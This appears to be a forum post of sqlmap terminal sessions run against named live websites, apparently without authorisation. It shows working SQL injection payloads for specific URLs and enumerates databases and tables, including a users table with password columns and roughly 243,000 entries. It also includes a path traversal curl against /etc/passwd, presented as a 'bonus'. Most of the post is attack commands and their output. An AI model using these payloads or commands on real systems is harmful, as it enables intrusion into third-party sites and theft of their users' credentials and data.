    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:59:07] [INFO] testing MySQL
[02:59:07] [INFO] confirming MySQL
[02:59:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Apache
back-end DBMS: MySQL >= 5.0.0
[02:59:08] [INFO] fetching columns for table 'usuarios' in database 'lc_ubase'
[02:59:09] [INFO] retrieved: 'colab','tinyint(1)'
[02:59:09] [INFO] retrieved: 'apodo','varchar(30)'
[02:59:10] [INFO] retrieved: 'correo','varchar(80)'
[02:59:10] [INFO] retrieved: 'clave','varchar(33)'
[02:59:11] [INFO] retrieved: 'status','char(1)'
[02:59:11] [INFO] retrieved: 'actkey','varchar(33)'
[02:59:11] [INFO] retrieved: 'creacion','int(11)'
[02:59:12] [INFO] retrieved: 'ultima','int(11)'
[02:59:12] [INFO] retrieved: 'ncons','mediumint(9)'
[02:59:12] [INFO] retrieved: 'amigo','varchar(20)'
[02:59:13] [INFO] retrieved: 'priv','tinyint(1)'
[02:59:13] [INFO] retrieved: 'acc','smallint(2)'
[02:59:14] [INFO] retrieved: 'newpass','varchar(64)'
[02:59:14] [INFO] retrieved: 'nof','tinyint(1)'
[02:59:14] [INFO] retrieved: 'expira','int(11)'
Database: lc_ubase
Table: usuarios
[15 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| status   | char(1)      |
| acc      | smallint(2)  |
| actkey   | varchar(33)  |
| amigo    | varchar(20)  |
| apodo    | varchar(30)  |
| clave    | varchar(33)  |
| colab    | tinyint(1)   |
| correo   | varchar(80)  |
| creacion | int(11)      |
| expira   | int(11)      |
| ncons    | mediumint(9) |
| newpass  | varchar(64)  |
| nof      | tinyint(1)   |
| priv     | tinyint(1)   |
| ultima   | int(11)      |
+----------+--------------+

[02:59:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:59:14 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*"   --dbms=mysql   --level=5   --risk=3   --batch     --random-agent -D lc_ubase -T usuarios --count
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:59:38 /2025-09-14/

[02:59:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Fedora/2.0.0.12-1.fc8 Firefox/2.0.0.12' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:59:38] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:59:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:59:38] [INFO] testing MySQL
[02:59:38] [INFO] confirming MySQL
[02:59:39] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Apache
back-end DBMS: MySQL >= 5.0.0
Database: lc_ubase
+----------+---------+
| Table    | Entries |
+----------+---------+
| usuarios | 243328  |
+----------+---------+

[02:59:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:59:40 /2025-09-14/

This one comes with a bonus

Code:
(myenv) root@E02S29:~# curl https://lacuerda.net/reload.php?fn=../../../../../../../../../../../../../../etc/passwd

Code:
(myenv) root@E02S29:~# sqlmap -u "https://surahquran.com/mp3/*" \
  --cookie="PHPSESSID=sh0e3l503ub9dlbitd50k2oc61" \
  --headers="X-Requested-With: XMLHttpRequest" \
  --dbms=mysql \
  --level=5 \
  --risk=3 \
  --batch \
  --flush-session \
  --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:37:20 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[04:37:25] [INFO] testing connection to the target URL
got a 302 redirect to 'https://surahquran.com/Download-Quran-mp3.html'. Do you want to follow? [Y/n] Y
[04:37:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[04:37:27] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[04:37:27] [WARNING] please consider usage of tamper scripts (option '--tamper')
[04:37:27] [INFO] testing if the target URL content is stable
[04:37:27] [WARNING] URI parameter '#1*' does not appear to be dynamic
[04:37:47] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[04:37:48] [INFO] testing for SQL injection on URI parameter '#1*'
[04:37:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:38:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[04:38:24] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[04:38:24] [INFO] testing 'Generic inline queries'
[04:38:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:38:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:38:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:38:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:38:25] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[04:38:25] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[04:38:26] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:38:26] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:38:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:38:27] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:38:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:38:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:38:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:38:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:38:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:38:28] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:38:28] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:38:28] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:38:29] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:38:29] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:38:29] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[04:38:29] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:38:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:38:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:38:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:38:29] [INFO] testing 'MySQL inline queries'
[04:38:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[04:38:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[04:38:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[04:38:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[04:38:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[04:38:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[04:38:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:38:41] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[04:38:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:38:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:38:47] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[04:38:53] [INFO] target URL appears to be UNION injectable with 11 columns
[04:38:53] [INFO] URI parameter '#1*' is 'Generic UNION query (random number) - 1 to 20 columns' injectable
[04:38:53] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 191 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: https://surahquran.com/mp3/-6467' OR 3427=3427-- iaNv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://surahquran.com/mp3/' AND (SELECT 5973 FROM (SELECT(SLEEP(5)))pNwX)-- DQfC

    Type: UNION query
    Title: Generic UNION query (random number) - 11 columns
    Payload: https://surahquran.com/mp3/' UNION ALL SELECT 9755,9755,9755,9755,9755,9755,9755,9755,CONCAT(0x71626a7071,0x546c525876526472787271466c614f616e4f495072546c714772646657786e787a6f6e4c6b4b4c68,0x716a6a6b71),9755,9755-- -
---
[04:38:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:38:54] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] surahq_forum

[04:38:54] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times
[04:38:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/surahquran.com'

[*] ending @ 04:38:54 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://surahquran.com/mp3/*"   --cookie="PHPSESSID=sh0e3l503ub9dlbitd50k2oc61"   --headers="X-Requested-With: XMLHttpRequest"   --dbms=mysql   --level=5   --risk=3   --batch      -D surahq_forum --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:39:53 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[04:39:53] [INFO] testing connection to the target URL
got a 302 redirect to 'https://surahquran.com/Download-Quran-mp3.html'. Do you want to follow? [Y/n] Y
[04:39:54] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[04:39:55] [INFO] testing MySQL
[04:39:55] [INFO] confirming MySQL
[04:40:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[04:40:00] [INFO] fetching tables for database: 'surahq_forum'
Database: surahq_forum
[158 tables]
+---------------------------+
| AzkarFootNotes            |
| Burmese_ghazimohammadha   |
| HSN_AMMAR                 |
| HSN_Ar                    |
| HSN_CategoriesHSN_Ar      |
| HSN_En                    |
| Oromoo                    |
| ahadith                   |
| ahadith_key               |
| almulla                   |
| am_sadiq                  |
| ara_quran411              |
| ara_quranphoneticst_la    |
| asma_husna                |
| ayat                      |
| ayetler                   |
| az_mammadaliyev           |
| az_musayev                |
| baghawy                   |
| ber_mensur                |
| bg_theophanov             |
| bn_bengali                |
| bn_hoque                  |
| bs_korkut                 |
| chapters                  |
| cities                    |
| dan_vandetaal             |
| de_bubenheim              |
| de_khoury                 |
| de_zaidan                 |
| en_almuntakhab            |
| en_hilali                 |
| en_mubarakpuri            |
| en_sahih                  |
| en_transliteration        |
| en_yusufali               |
| es_garcia                 |
| es_navio                  |
| es_noor                   |
| fa_ayati                  |
| fa_khorramdel             |
| fa_mokhtasar_islamhouse   |
| fa_tagi                   |
| fil_abdullatifeduar       |
| fil_islamhouse            |
| fr_hamidullah             |
| fr_mokhtasar_islamhouse   |
| fr_noor                   |
| fr_rashid                 |
| ful_rowadtranslatio       |
| guj_rabilaalomari         |
| ha_gumi                   |
| hi_farooq                 |
| hi_footnotes              |
| hi_hindi                  |
| id_indonesian             |
| id_muntakhab              |
| ind_muhammadquraish       |
| irab_word                 |
| islamveihsan              |
| it_piccardo               |
| ja_japanese               |
| ja_jawa                   |
| kaz_khalifaha2            |
| kaz_khalifahaltaich       |
| kaz_turk                  |
| kir_shamsaldinhakim       |
| ko_korean                 |
| kor_hamidchoi             |
| ku_asan                   |
| ku_kurdish                |
| languages                 |
| ml_abdulhameed            |
| ms_basmeih                |
| nl_siregar                |
| no_berg                   |
| pan_drmuhamadhabibb       |
| pl_bielawskiego           |
| ps_abdulwali              |
| pt_elhayek                |
| pt_helmy                  |
| qaritelawat               |
| qura_shabab               |
| quran                     |
| quranWords                |
| quran_ayat                |
| quran_contactus           |
| quran_fanoos              |
| quran_general             |
| quran_id                  |
| quran_khatmat             |
| quran_recitation          |
| quran_root                |
| ru_muntahab               |
| ru_porokhova              |
| sahih_alhadith            |
| sd_amroti                 |
| si_sinhalese              |
| so_abduh                  |
| sorah                     |
| sorahqyat                 |
| sq_nahi                   |
| surah_content             |
| sureler                   |
| sv_bernstrom              |
| sw_barwani                |
| sw_barwani_footnotes      |
| ta_tamil                  |
| tafsir_e3rab_quran        |
| tafsir_e3rab_tafsircenter |
| tafsir_hidayat            |
| tafsir_ibn_abbas_en       |
| tafsir_jalalayn_en        |
| tafsir_jalalayn_id        |
| tafsir_mokhtasar_bn       |
| tafsir_mokhtasar_en       |
| tafsir_mokhtasar_id       |
| tafsir_mokhtasar_it       |
| tafsir_mokhtasar_zh       |
| tafsir_tabary             |
| tafsir_tahlili_id         |
| tafsir_wajiz_id           |
| tafsir_word               |
| tafsir_word_meaning       |
| tafsser                   |
| tags                      |
| tel_abdulraheemmoha       |
| tfs_ar_katheer            |
| tfs_ar_sa3dy              |
| tg_ayati                  |
| th_thai                   |
| topic_ayat                |
| topic_ayatold             |
| topics_name               |
| tr_anscription            |
| tr_arab                   |
| tr_diyanet                |
| tr_golpinarli             |
| tr_mokhtasar_islamhouse   |
| tr_transliteration        |
| tr_vakfi                  |
| transliteration           |
| tt_nugman                 |
| tur_alifikriyavu          |
| ug_saleh                  |
| ur_footnotes              |
| ur_jalandhry              |
| ur_maududi                |
| uz_mansour                |
| uz_sodik                  |
| uzb_muhammadsodikmu       |
| vi_rwwad                  |
| worddata                  |
| yor_shaykhaburahima       |
| zh_jian                   |
| zh_majian                 |
| zho_mazhonggang           |
| zho_muhammadmakin         |
+---------------------------+

[04:40:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/surahquran.com'

[*] ending @ 04:40:01 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://surahquran.com/mp3/*"   --cookie="PHPSESSID=sh0e3l503ub9dlbitd50k2oc61"   --headers="X-Requested-With: XMLHttpRequest"   --dbms=mysql   --level=5   --risk=3   --batch      -D surahq_forum --tables --count
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:41:54 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[04:41:54] [INFO] testing connection to the target URL
got a 302 redirect to 'https://surahquran.com/Download-Quran-mp3.html'. Do you want to follow? [Y/n] Y
[04:41:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[04:41:55] [INFO] testing MySQL
[04:41:55] [INFO] confirming MySQL
[04:41:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[04:41:58] [INFO] fetching tables for database: 'surahq_forum'
[04:41:58] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
Database: surahq_forum
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| ahadith                   | 131826  |
| irab_word                 | 77432   |
| quranWords                | 77432   |
| tafsir_word               | 77432   |
| tafsir_word_meaning       | 77432   |
| ahadith_key               | 24738   |
| tafsser                   | 18708   |
| sahih_alhadith            | 16351   |
| topic_ayat                | 15054   |
| worddata                  | 10525   |
| topic_ayatold             | 7587    |
| tafsir_e3rab_quran        | 6237    |
| almulla                   | 6236    |
| am_sadiq                  | 6236    |
| ara_quran411              | 6236    |
| ara_quranphoneticst_la    | 6236    |
| ayat                      | 6236    |
| ayetler                   | 6236    |
| az_mammadaliyev           | 6236    |
| az_musayev                | 6236    |
| baghawy                   | 6236    |
| ber_mensur                | 6236    |
| bg_theophanov             | 6236    |
| bn_bengali                | 6236    |
| bn_hoque                  | 6236    |
| bs_korkut                 | 6236    |
| Burmese_ghazimohammadha   | 6236    |
| dan_vandetaal             | 6236    |
| de_bubenheim              | 6236    |
| de_khoury                 | 6236    |
| de_zaidan                 | 6236    |
| en_almuntakhab            | 6236    |
| en_hilali                 | 6236    |
| en_mubarakpuri            | 6236    |
| en_sahih                  | 6236    |
| en_transliteration        | 6236    |
| en_yusufali               | 6236    |
| es_garcia                 | 6236    |
| es_navio                  | 6236    |
| es_noor                   | 6236    |
| fa_ayati                  | 6236    |
| fa_khorramdel             | 6236    |
| fa_mokhtasar_islamhouse   | 6236    |
| fa_tagi                   | 6236    |
| fil_abdullatifeduar       | 6236    |
| fil_islamhouse            | 6236    |
| fr_hamidullah             | 6236    |
| fr_mokhtasar_islamhouse   | 6236    |
| fr_noor                   | 6236    |
| fr_rashid                 | 6236    |
| ful_rowadtranslatio       | 6236    |
| guj_rabilaalomari         | 6236    |
| ha_gumi                   | 6236    |
| hi_farooq                 | 6236    |
| hi_footnotes              | 6236    |
| hi_hindi                  | 6236    |
| id_indonesian             | 6236    |
| id_muntakhab              | 6236    |
| ind_muhammadquraish       | 6236    |
| islamveihsan              | 6236    |
| it_piccardo               | 6236    |
| ja_japanese               | 6236    |
| ja_jawa                   | 6236    |
| kaz_khalifaha2            | 6236    |
| kaz_khalifahaltaich       | 6236    |
| kaz_turk                  | 6236    |
| kir_shamsaldinhakim       | 6236    |
| ko_korean                 | 6236    |
| kor_hamidchoi             | 6236    |
| ku_asan                   | 6236    |
| ku_kurdish                | 6236    |
| ml_abdulhameed            | 6236    |
| ms_basmeih                | 6236    |
| nl_siregar                | 6236    |
| no_berg                   | 6236    |
| Oromoo                    | 6236    |
| pan_drmuhamadhabibb       | 6236    |
| pl_bielawskiego           | 6236    |
| ps_abdulwali              | 6236    |
| pt_elhayek                | 6236    |
| pt_helmy                  | 6236    |
| quran                     | 6236    |
| quran_ayat                | 6236    |
| quran_fanoos              | 6236    |
| quran_id                  | 6236    |
| ru_muntahab               | 6236    |
| ru_porokhova              | 6236    |
| sd_amroti                 | 6236    |
| si_sinhalese              | 6236    |
| so_abduh                  | 6236    |
| sorahqyat                 | 6236    |
| sq_nahi                   | 6236    |
| sv_bernstrom              | 6236    |
| sw_barwani                | 6236    |
| sw_barwani_footnotes      | 6236    |
| ta_tamil                  | 6236    |
| tafsir_e3rab_tafsircenter | 6236    |
| tafsir_hidayat            | 6236    |
| tafsir_ibn_abbas_en       | 6236    |
| tafsir_jalalayn_en        | 6236    |
| tafsir_jalalayn_id        | 6236    |
| tafsir_mokhtasar_bn       | 6236    |
| tafsir_mokhtasar_en       | 6236    |
| tafsir_mokhtasar_id       | 6236    |
| tafsir_mokhtasar_it       | 6236    |
| tafsir_mokhtasar_zh       | 6236    |
| tafsir_tabary             | 6236    |
| tafsir_tahlili_id         | 6236    |
| tafsir_wajiz_id           | 6236    |
| tags                      | 6236    |
| tel_abdulraheemmoha       | 6236    |
| tfs_ar_katheer            | 6236    |
| tfs_ar_sa3dy              | 6236    |
| tg_ayati                  | 6236    |
| th_thai                   | 6236    |
| tr_anscription            | 6236    |
| tr_arab                   | 6236    |
| tr_diyanet                | 6236    |
| tr_golpinarli             | 6236    |
| tr_mokhtasar_islamhouse   | 6236    |
| tr_transliteration        | 6236    |
| tr_vakfi                  | 6236    |
| transliteration           | 6236    |
| tt_nugman                 | 6236    |
| tur_alifikriyavu          | 6236    |
| ug_saleh                  | 6236    |
| ur_footnotes              | 6236    |
| ur_jalandhry              | 6236    |
| ur_maududi                | 6236    |
| uz_mansour                | 6236    |
| uz_sodik                  | 6236    |
| uzb_muhammadsodikmu       | 6236    |
| vi_rwwad                  | 6236    |
| yor_shaykhaburahima       | 6236    |
| zh_jian                   | 6236    |
| zh_majian                 | 6236    |
| zho_mazhonggang           | 6236    |
| zho_muhammadmakin         | 6236    |
| qaritelawat               | 3227    |
| quran_root                | 1918    |
| cities                    | 1428    |
| topics_name               | 1188    |
| HSN_AMMAR                 | 317     |
| HSN_Ar                    | 317     |
| HSN_CategoriesHSN_Ar      | 317     |
| AzkarFootNotes            | 301     |
| HSN_En                    | 257     |
| quran_recitation          | 168     |
| sorah                     | 114     |
| surah_content             | 114     |
| sureler                   | 114     |
| asma_husna                | 99      |
| qura_shabab               | 63      |
| languages                 | 55      |
| chapters                  | 30      |
| quran_general             | 2       |
| quran_contactus           | 1       |
+---------------------------+---------+

[04:42:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/surahquran.com'

[*] ending @ 04:42:43 /2025-09-14/
 
Code:
Database: kmansin5s
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 910250  |
| chapter_views          | 702192  |
| chapters               | 170149  |
| user_log_reading       | 8932    |
| taxonomy_manga         | 8354    |
| mangas                 | 1898    |
| emoji                  | 846     |
| statistic              | 336     |
| user_reading_list      | 158     |
| reported               | 15      |
| user_avatar            | 1       |
+------------------------+---------+

Database: koma01com
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| taxonomy_manga         | 15406   |
| `user`                 | 10162   |
| ratings                | 4958    |
| mangas                 | 4477    |
| taxonomy               | 3101    |
| statistic              | 1096    |
| emoji                  | 846     |
| manga_comments         | 141     |
| `level`                | 100     |
| user_request           | 5       |
+------------------------+---------+

Database: sql_test_doctruy
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| mac_type               | 18      |
| mac_admin              | 1       |
| mac_comment            | 1       |
+------------------------+---------+

Database: backup_29_11_2022
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| user_reading_list      | 889     |
| emoji                  | 846     |
| taxonomy_manga         | 520     |
| `level`                | 100     |
| manga_comments         | 71      |
| statistic              | 48      |
| user_avatar            | 40      |
+------------------------+---------+

Database: mangaplus
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_views          | 425284  |
| chapter_data           | 28805   |
| emoji                  | 846     |
| `user`                 | 170     |
| mangas                 | 64      |
| user_avatar            | 38      |
| ratings                | 17      |
| manga_comments         | 6       |
+------------------------+---------+

Database: manhuaplus_xyz
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_data           | 14021   |
| chapters               | 14021   |
| taxonomy_manga         | 459     |
| statistic              | 150     |
| taxonomy               | 82      |
| mangas                 | 49      |
| user_log_reading       | 16      |
| user_avatar            | 1       |
+------------------------+---------+

Database: wp_test
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_options             | 175     |
| wp_usermeta            | 19      |
| wp_term_relationships  | 1       |
| wp_users               | 1       |
+------------------------+---------+

Database: mangasect
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 1112158 |
| chapter_views          | 826925  |
| log_views              | 59559   |
| taxonomy_manga         | 3755    |
| taxonomy               | 2637    |
| `user`                 | 2074    |
| reported               | 1347    |
| statistic              | 502     |
| `level`                | 100     |
| manga_comments         | 82      |
| user_request           | 3       |
+------------------------+---------+

Database: manhuaplus_org
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| user_log_reading       | 19664744 |
| user_reading_list      | 467031  |
| reported               | 79849   |
| log_views              | 78869   |
| `user`                 | 44859   |
| taxonomy_manga         | 16280   |
| manga_comments         | 15289   |
| taxonomy               | 14731   |
| statistic              | 850     |
| user_avatar_frame      | 46      |
+------------------------+---------+

Database: sys
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| sys_config             | 6       |
+------------------------+---------+

Database: mangakoma
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_views          | 1232939 |
| taxonomy_manga         | 1054    |
| user_reading_list      | 788     |
| mangas                 | 362     |
| reported               | 285     |
| `level`                | 100     |
| ratings                | 62      |
| user_avatar            | 28      |
+------------------------+---------+

Database: mangakoma-new
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_views          | 806569  |
| log_views              | 209944  |
| chapters               | 103246  |
| user_log_reading       | 59096   |
| taxonomy_manga         | 5932    |
| mangas                 | 1600    |
| taxonomy               | 903     |
| emoji                  | 846     |
| user_avatar            | 28      |
| manga_comments         | 5       |
+------------------------+---------+

Database: raw5s
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_data           | 80214   |
| log_views              | 41223   |
| taxonomy_manga         | 4961    |
| mangas                 | 1386    |
| emoji                  | 846     |
| `level`                | 100     |
| `user`                 | 8       |
+------------------------+---------+

Database: freemail
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| access_log             | 412     |
| mail                   | 100     |
+------------------------+---------+

Database: yymh
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| qiswl_admin_user       | 3       |
+------------------------+---------+

Database: bestmanhua
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_data           | 33336   |
| taxonomy_manga         | 11452   |
| mangas                 | 391     |
| `user`                 | 169     |
| reported               | 50      |
+------------------------+---------+

Database: mysql
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
